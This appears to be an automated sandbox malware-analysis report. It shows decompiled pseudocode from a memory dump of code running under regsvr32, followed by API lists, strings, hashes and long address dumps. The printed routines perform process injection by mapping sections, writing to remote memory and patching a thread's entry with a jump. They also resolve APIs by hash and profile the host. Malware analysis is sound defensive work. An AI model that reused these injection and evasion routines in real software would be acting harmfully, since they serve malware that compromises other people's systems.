					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x74f8d0; // 0xc2f8c0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E00738E2E( *0x74f8d4, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E00738DDF( &_v36, 0x1ac4);
					_t119 =  *0x74f8d4; // 0xc2fc00
					_t155 =  *0x74f8e8; // 0x730000
					_v36 = _t119;
					 *0x74f8e8 = _v8;
					 *0x74f8d4 = _t163;
					E00738EA6(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E0073D4B7(_v16, _v8, _v44);
					_t124 = E0073A5D0("Jjischug");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x74f8e8 = _t155;
						 *0x74f8d4 = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}






































              0x0073d53e
              0x0073d544
              0x0073d546
              0x0073d54a
              0x0073d54c
              0x0073d54f
              0x0073d552
              0x0073d555
              0x0073d558
              0x0073d55b
              0x0073d566
              0x0073d569
              0x0073d570
              0x0073d570
              0x0073d575
              0x0073d578
              0x0073d57a
              0x0073d57d
              0x0073d586
              0x0073d77f
              0x0073d77f
              0x0073d782
              0x0073d785
              0x0073d78a
              0x0073d790
              0x0073d793
              0x0073d793
              0x0073d796
              0x0073d79a
              0x0073d79c
              0x0073d7b1
              0x0073d7b1
              0x0073d7bb
              0x0073d7c5
              0x0073d7c5
              0x0073d7cc
              0x0073d7cc
              0x0073d595
              0x0073d5af
              0x00000000
              0x00000000
              0x0073d5b5
              0x0073d5bd
              0x0073d5c5
              0x0073d5cb
              0x0073d5d2
              0x0073d5da
              0x0073d5db
              0x0073d5e2
              0x0073d5e5
              0x0073d5e6
              0x0073d5ed
              0x0073d5f0
              0x0073d5f7
              0x0073d5f8
              0x0073d5fb
              0x0073d607
              0x0073d629
              0x0073d631
              0x0073d634
              0x0073d63f
              0x0073d63f
              0x0073d631
              0x0073d65b
              0x0073d66a
              0x0073d66d
              0x0073d672
              0x00000000
              0x0073d69c
              0x0073d6ac
              0x0073d6ae
              0x0073d6b5
              0x00000000
              0x00000000
              0x0073d6ca
              0x0073d6dd
              0x0073d6f1
              0x0073d6fd
              0x0073d702
              0x0073d707
              0x0073d70d
              0x0073d713
              0x0073d71b
              0x0073d72b
              0x0073d737
              0x0073d741
              0x0073d749
              0x0073d74e
              0x0073d751
              0x0073d759
              0x0073d759
              0x0073d759
              0x0073d75c
              0x0073d760
              0x0073d761
              0x0073d765
              0x0073d769
              0x0073d772
              0x0073d778
              0x00000000
              0x0073d778
              0x0073d753
              0x0073d757
              0x00000000
              0x00000000
              0x00000000
              0x0073d757

              APIs
              • NtCreateSection.NTDLL(0073DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0073D5AA
              • RegisterClassExA.USER32(?), ref: 0073D5FE
              • CreateWindowExA.USER32 ref: 0073D629
              • DestroyWindow.USER32(00000000), ref: 0073D634
              • UnregisterClassA.USER32 ref: 0073D63F
              • NtMapViewOfSection.NTDLL(0073DA07,00000000), ref: 0073D66A
              • NtMapViewOfSection.NTDLL(0073DA07,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 0073D691
              • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 0073D6D7
              • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 0073D6F1
                • Part of subcall function 00738DDF: HeapFree.KERNEL32(00000000,00000000), ref: 00738E25
              • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,00736297), ref: 0073D769
              • NtUnmapViewOfSection.NTDLL(00000000), ref: 0073D7B1
              • NtClose.NTDLL(00000000), ref: 0073D7C5
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
              • String ID: 0$18293$Jjischug$aeroflot
              • API String ID: 494031690-3772587274
              • Opcode ID: b47c91bc8402b750e5231aa36db5e415f61c2858e06f549da993aa54d24e5bfc
              • Instruction ID: ca6ad170f1d20b648f744dbc8f2debe5558446d285a7ead48c98fe5dfbe4c529
              • Opcode Fuzzy Hash: b47c91bc8402b750e5231aa36db5e415f61c2858e06f549da993aa54d24e5bfc
              • Instruction Fuzzy Hash: BF811AB5901219EFEB10DF94EC89AEEBBB8FF09344F14406AE515E7261D778AD00CB64
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073DFC2 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 250COMMON
              Download Yara Rule

              Control-flow Graph

              C-Code - Quality: 79%
              			E0073DFC2(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x74f8e8; // 0x730000
				_t68 = E00738DC9(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x74f8d0; // 0xc2f8c0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E007435A9( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x74f8d0; // 0xc2f8c0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E007397E9(_t194, _t207);
					}
					_t75 =  *0x74f8d0; // 0xc2f8c0
					_t77 = E0073CA0A( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E0073CB85( *_t77) == 0) {
						_t79 = E0073CA5A(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E0073F3A0(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E0073F365(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x74f8d8; // 0xc2fab0
					_push(0); // executed
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E0073DFBB(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E007397E9(_t149, _t211);
					}
					_t92 = E0073C85A();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E0073C64D(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E00739BD5(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E00739803(_t149, _t36);
					_t97 = E0073E34A(_t196, E0073A5D0(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E0073C870(_t97, _t37, _t216);
					_t99 =  *0x74f8d0; // 0xc2f8c0
					_t101 = E0073CBD7( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E00738F63(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E0073DDBE(_t100);
					_t106 = E0073DDE7(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E00739F85(_t105, 0xf73);
					_t177 =  *0x74f8d0; // 0xc2f8c0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x74f8d0; // 0xc2f8c0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E00738D9A( &_v8);
					_t113 =  *0x74f8d0; // 0xc2f8c0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E00739FE4(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x74f8d0; // 0xc2f8c0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x74f8d0; // 0xc2f8c0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x74f8d0; // 0xc2f8c0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x74f8d0; // 0xc2f8c0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x74f8d0; // 0xc2f8c0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x74f8d0; // 0xc2f8c0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E007435A9(E0073E34A(_t62, E0073A5D0(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E0074357B( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E007398D0(_t66, _t191);
					_t134 = E0073DB68(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}























































              0x0073dfc2
              0x0073dfcc
              0x0073dfd8
              0x0073dfdd
              0x0073dfe2
              0x0073dfef
              0x0073dff5
              0x0073dffa
              0x0073e000
              0x0073e010
              0x0073e015
              0x0073e01a
              0x0073e01a
              0x0073e02a
              0x0073e030
              0x0073e032
              0x0073e03b
              0x0073e03b
              0x0073e041
              0x0073e04e
              0x0073e053
              0x0073e059
              0x0073e062
              0x0073e070
              0x0073e077
              0x0073e07c
              0x0073e07c
              0x0073e07d
              0x0073e064
              0x0073e064
              0x0073e064
              0x0073e083
              0x0073e089
              0x0073e08e
              0x0073e094
              0x0073e099
              0x0073e09f
              0x0073e09f
              0x0073e0a8
              0x0073e0ae
              0x0073e0b2
              0x0073e0b9
              0x0073e0c0
              0x0073e0c7
              0x0073e0cb
              0x0073e0d2
              0x0073e0d3
              0x0073e0d5
              0x0073e0da
              0x0073e0e1
              0x0073e0e3
              0x0073e0e3
              0x0073e0f3
              0x0073e0f8
              0x0073e0f8
              0x0073e105
              0x0073e10b
              0x0073e110
              0x0073e112
              0x0073e11b
              0x0073e11b
              0x0073e123
              0x0073e128
              0x0073e128
              0x0073e12e
              0x0073e139
              0x0073e13e
              0x0073e146
              0x0073e14c
              0x0073e154
              0x0073e166
              0x0073e16c
              0x0073e174
              0x0073e179
              0x0073e186
              0x0073e197
              0x0073e19d
              0x0073e1a2
              0x0073e1a5
              0x0073e1a8
              0x0073e1b5
              0x0073e1bb
              0x0073e1c5
              0x0073e1c5
              0x0073e1cb
              0x0073e1d3
              0x0073e1de
              0x0073e1e3
              0x0073e1e9
              0x0073e1eb
              0x0073e1f8
              0x0073e1f9
              0x0073e1fa
              0x0073e205
              0x0073e207
              0x0073e20e
              0x0073e20e
              0x0073e218
              0x0073e21d
              0x0073e222
              0x0073e222
              0x0073e228
              0x0073e22f
              0x0073e230
              0x0073e23d
              0x0073e250
              0x0073e255
              0x0073e25a
              0x0073e263
              0x0073e263
              0x0073e269
              0x0073e26e
              0x0073e274
              0x0073e27a
              0x0073e27f
              0x0073e288
              0x0073e28a
              0x0073e291
              0x0073e291
              0x0073e297
              0x0073e29f
              0x0073e2a4
              0x0073e2a5
              0x0073e2aa
              0x0073e2b3
              0x0073e2b5
              0x0073e2c0
              0x0073e2c0
              0x0073e2c9
              0x0073e2d1
              0x0073e2d8
              0x0073e2dd
              0x0073e2ec
              0x0073e304
              0x0073e30b
              0x0073e319
              0x0073e324
              0x0073e325
              0x0073e329
              0x0073e32f
              0x0073e330
              0x0073e338
              0x0073e33d
              0x00000000
              0x0073e345
              0x0073e349

              APIs
                • Part of subcall function 00738DC9: RtlAllocateHeap.NTDLL(00000008,?,?,00739793,00000100,?,0073661B), ref: 00738DD7
              • GetCurrentProcessId.KERNEL32 ref: 0073DFE9
              • GetLastError.KERNEL32 ref: 0073E0E3
              • GetSystemMetrics.USER32(00001000), ref: 0073E0F3
              • GetVersionExA.KERNEL32(00000000), ref: 0073E1A8
                • Part of subcall function 0073CA5A: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,00730000), ref: 0073CAFE
              • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0073E1D3
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
              • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
              • API String ID: 3131805607-2706916422
              • Opcode ID: 7beac18cba9e5915a60a56c442105eebc30ac6be56a6c3a3f75514c497910318
              • Instruction ID: 87f8fa17a387f7ac7d8780f54b4d8338128039740ae53de15751ea47221ca9ec
              • Opcode Fuzzy Hash: 7beac18cba9e5915a60a56c442105eebc30ac6be56a6c3a3f75514c497910318
              • Instruction Fuzzy Hash: E2918E75700605EFE704EB74DC49FEAB7E8BF09300F04416AF519D7292EB78AA448BA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073D9DE Relevance: 6.1, APIs: 4, Instructions: 89nativethreadCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 143 73d9de-73d9f7 call 73d309 146 73dad0-73dadb call 73d47c 143->146 147 73d9fd-73da0b call 73d538 143->147 147->146 152 73da11-73da48 call 738f63 GetThreadContext 147->152 152->146 155 73da4e-73da8e NtProtectVirtualMemory 152->155 156 73da90-73daab NtWriteVirtualMemory 155->156 157 73dace 155->157 156->157 158 73daad-73dacc NtProtectVirtualMemory 156->158 157->146 158->146 158->157
              C-Code - Quality: 100%
              			E0073D9DE(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E0073D309(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E0073D538( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E00738F63( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				E0073D47C();
				return _t66;
			}



















              0x0073d9ea
              0x0073d9ec
              0x0073d9ee
              0x0073d9f7
              0x0073da02
              0x0073da07
              0x0073da0b
              0x0073da1f
              0x0073da27
              0x0073da48
              0x0073da4e
              0x0073da56
              0x0073da64
              0x0073da6a
              0x0073da6b
              0x0073da77
              0x0073da7e
              0x0073da8e
              0x0073dace
              0x0073dace
              0x0073daad
              0x0073daad
              0x0073dacc
              0x00000000
              0x00000000
              0x0073dacc
              0x0073da8e
              0x0073da48
              0x0073da0b
              0x0073dad0
              0x0073dadb

              APIs
                • Part of subcall function 0073D309: LoadLibraryW.KERNEL32 ref: 0073D403
                • Part of subcall function 0073D538: NtCreateSection.NTDLL(0073DA07,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0073D5AA
                • Part of subcall function 0073D538: RegisterClassExA.USER32(?), ref: 0073D5FE
                • Part of subcall function 0073D538: CreateWindowExA.USER32 ref: 0073D629
                • Part of subcall function 0073D538: DestroyWindow.USER32(00000000), ref: 0073D634
                • Part of subcall function 0073D538: UnregisterClassA.USER32 ref: 0073D63F
                • Part of subcall function 00738F63: memset.MSVCRT ref: 00738F75
              • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0073DA40
              • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0073DA89
              • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0073DAA6
              • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0073DAC7
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
              • String ID:
              • API String ID: 1578692462-0
              • Opcode ID: 550e93fe8c4a587f071f0349e4e1cc29e48d6e8e997aa570239b38f00566ca61
              • Instruction ID: f1832a75d471ba21f9982afc1f930fd8b4a2e8063dcaa1a12a95cdab20df17d4
              • Opcode Fuzzy Hash: 550e93fe8c4a587f071f0349e4e1cc29e48d6e8e997aa570239b38f00566ca61
              • Instruction Fuzzy Hash: F1314F76A0011AAFEB11DFA4DD49FDEB7BCAF04310F144166E505E3261D734EE149B94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073EF38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 179 73ef38-73ef4f 180 73ef51-73ef79 179->180 181 73efac 179->181 180->181 182 73ef7b-73ef9e call 73a5d0 call 73e34a 180->182 183 73efae-73efb2 181->183 188 73efb3-73efca 182->188 189 73efa0-73efaa 182->189 190 73f020-73f022 188->190 191 73efcc-73efd4 188->191 189->181 189->182 190->183 191->190 192 73efd6 191->192 193 73efd8-73efde 192->193 194 73efe0-73efe2 193->194 195 73efee-73efff 193->195 194->195 196 73efe4-73efec 194->196 197 73f001-73f002 195->197 198 73f004-73f010 LoadLibraryA 195->198 196->193 196->195 197->198 198->181 199 73f012-73f01c GetProcAddress 198->199 199->181 200 73f01e 199->200 200->183
              C-Code - Quality: 100%
              			E0073EF38(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0073E34A( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0073A5D0( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























              0x0073ef41
              0x0073ef43
              0x0073ef46
              0x0073ef49
              0x0073ef4f
              0x0073efac
              0x00000000
              0x0073efac
              0x0073ef51
              0x0073ef5c
              0x0073ef5f
              0x0073ef64
              0x0073ef69
              0x0073ef6c
              0x0073ef6e
              0x0073ef71
              0x0073ef74
              0x0073ef79
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0073ef7b
              0x0073ef7b
              0x0073ef8d
              0x0073ef9a
              0x0073ef9e
              0x00000000
              0x00000000
              0x0073efa0
              0x0073efa3
              0x0073efa4
              0x0073efaa
              0x00000000
              0x00000000
              0x00000000
              0x0073efaa
              0x0073efc1
              0x0073efc6
              0x0073efca
              0x00000000
              0x0073efd6
              0x0073efd6
              0x0073efd8
              0x0073efd8
              0x0073efde
              0x00000000
              0x00000000
              0x0073efe4
              0x0073efe8
              0x0073efec
              0x00000000
              0x00000000
              0x00000000
              0x0073efec
              0x0073eff2
              0x0073effa
              0x0073efff
              0x0073f002
              0x0073f002
              0x0073f004
              0x0073f008
              0x0073f010
              0x00000000
              0x00000000
              0x0073f014
              0x0073f01c
              0x00000000
              0x00000000
              0x00000000
              0x0073f01c

              APIs
              • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0073F008
              • GetProcAddress.KERNEL32(00000000,?), ref: 0073F014
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.320581974.0000000000730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_730000_regsvr32.jbxd
              Yara matches
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID: .dll
              • API String ID: 2574300362-2738580789
              • Opcode ID: 92bfeae1058c1ac8a7003bc64a211f9e924712ac8a46e19f784e267b864bbde1
              • Instruction ID: b3af3ca84255038805a550b9ef5491fb5aebf167fb1118ba02100a861f2cafc6
              • Opcode Fuzzy Hash: 92bfeae1058c1ac8a7003bc64a211f9e924712ac8a46e19f784e267b864bbde1
              • Instruction Fuzzy Hash: B431E731A001169BEB64CF6DC880BAEBBF5AF44304F284469D845D7393E774DD41CB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0073BAF6 Relevance: 4.6, APIs: 3, Instructions: 66processCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 221 73baf6-73bb1e CreateToolhelp32Snapshot 222 73bb20-73bb49 call 738f63 Process32First 221->222 223 73bb8e-73bb94 221->223 226 73bb4b-73bb57 222->226 227 73bb59-73bb69 call 73daf2 222->227 226->223 230 73bb6b-73bb7c 227->230 231 73bb7e-73bb8b FindCloseChangeNotification 227->231 230->227 230->231 231->223
              C-Code - Quality: 72%
              			E0073BAF6(void* __ecx, void* __edx) {
				void* _v304;
				char _v308;
				intOrPtr _v312;
				signed int _t16;
				signed int _t17;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t38;
				void* _t43;
				void* _t45;

				_t33 = __edx;
				_v304 = __ecx;
				_t16 = CreateToolhelp32Snapshot(2, 0);
				_t45 = _t16;
				_t17 = _t16 | 0xffffffff;
				if(_t45 != _t17) {
					E00738F63( &_v304, 0, 0x128);
					_v304 = 0x128;
					if(Process32First(_t45,  &_v304) != 0) {
						while(1) {
							_t43 = _v312( &_v308, _t33);
							if(_t43 == 0) {
								break;
							}
							_t38 =  *0x74f8d0; // 0xc2f8c0
							_push( &_v308);
							_push(_t45);
							if( *((intOrPtr*)(_t38 + 0x44))() != 0) {
								continue;
							}
							break;
						}
						FindCloseChangeNotification(_t45);
						_t17 = 0 | _t43 == 0x00000000;
					} else {
						_t30 =  *0x74f8d0; // 0xc2f8c0
						 *((intOrPtr*)(_t30 + 0x30))(_t45);
						_t17 = 0xfffffffe;
					}
				}
				return _t17;
			}













              0x0073bb0e
              0x0073bb10
              0x0073bb14
              0x0073bb17
              0x0073bb19
              0x0073bb1e
              0x0073bb2d
              0x0073bb35
              0x0073bb49
              0x0073bb59
              0x0073bb63
              0x0073bb69
              0x00000000
              0x00000000
              0x0073bb6b
              0x0073bb75
              0x0073bb76
              0x0073bb7c
              0x00000000
              0x00000000
              0x00000000
              0x0073bb7c
              0x0073bb84
              0x0073bb8b
              0x0073bb4b
              0x0073bb4b
              0x0073bb51
              0x0073bb56
              0x0073bb56
              0x0073bb49
              0x0073bb94

              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0073BB14
